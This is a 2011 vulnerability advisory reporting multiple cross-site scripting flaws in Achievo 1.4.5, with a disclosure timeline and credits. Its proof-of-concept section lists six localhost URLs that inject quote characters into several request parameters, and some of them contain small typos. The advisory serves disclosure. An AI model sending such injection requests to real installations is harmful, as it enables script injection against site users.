Advisory: Achievo 1.4.5 Multiple XSS vulnerabilities
Advisory ID: SSCHADV2011-037
Author: Stefan Schurtz
Affected Software: Successfully tested on Achievo 1.4.5
Vendor URL: http://www.achievo.org/
Vendor Status: informed
CVE-ID: -
==========================
Vulnerability Description
==========================
Achievo 1.4.5 is prone to multiple Cross-Site scripting vulernabilities
==================
PoC-Exploit
==================
hhttp://localhost/achievo-1.4.5/?'"
http://localhost/achievo-1.4.5/index.php?'"
http://localhost/achievo-1.4.5/dispatch.php?atknodetype=pim.pim&atkaction='"&atklevel=-1&atkprevlevel=0&=3
http://localhost/achievo-1.4.5/dispatch.php?atknodetype=employee.employee&atkaction=admin&atklevel='"&atkprevlevel=0&atkstackid=4ed138e7eed8c&=3
http://localhost/achievo-1.4.5/dispatch.php?atknodetype=employee.employee&atkaction=admin&atklevel=1&atkprevlevel=0&atkstackid='"&=3
http://localhost/achievo-1.4.5//dispatch.php?atknodetype='"&atkaction=admin&atkpartial=datagrid&atklevel=-3&atkprevlevel=0&atkstackid=4ed13952e1bf3&=3
=========
Solution
=========
-
====================
Disclosure Timeline
====================
26-Nov-2011 - informed developers
28-Nov-2011 - release date of this security advisory
========
Credits
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References
===========
http://www.rul3z.de/advisories/SSCHADV2011-037.txti